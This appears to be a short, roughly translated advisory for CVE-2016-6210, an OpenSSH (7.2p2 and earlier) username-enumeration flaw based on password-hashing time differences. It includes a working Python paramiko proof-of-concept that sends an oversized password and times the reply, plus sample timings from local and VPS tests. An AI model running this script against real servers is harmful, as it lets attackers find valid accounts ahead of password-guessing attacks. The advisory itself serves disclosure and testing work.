CVE-2016-6210: OpenSSH – user enumeration

1.Sphere of influence

OpenSSH <=OpenSSH 7.2p2

2.Descriptions of the vulnerability

When we use the user name does not exist to connect ssh server, SSHD will be based BLOWFISH algorithm to generate a fake password, but if the user name exists, SSHD uses a SHA256 / SHA512 algorithm to encrypt the password. So we sent a large password (> 10KB), SHA256 algorithm to calculate time much longer than the BLOWFISH algorithm fake password. So based on this principle, we can enumerate ssh username.

3.Vulnerability to prove

python script testing is as follows

import paramiko

import time

user=raw_input("user: ")

p='A'*25000

ssh = paramiko.SSHClient()

starttime=time.time()

ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

try:

        ssh.connect('127.0.0.1', username=user,

        password=p)

except:

        endtime=time.time()

total=endtime-starttime

print(total)

First, using a user name that does not exist for testing:Respectively, using a local network to internal network servers, network external network VPS server for testing

Then use the root account exists for testing

8.7 seconds> 2.56 seconds, the test is successful!

VPS

First, using a user name that does not exist for testing:

Then use the root account exists for testing:

12.66 seconds> 4.74 seconds, the test is successful!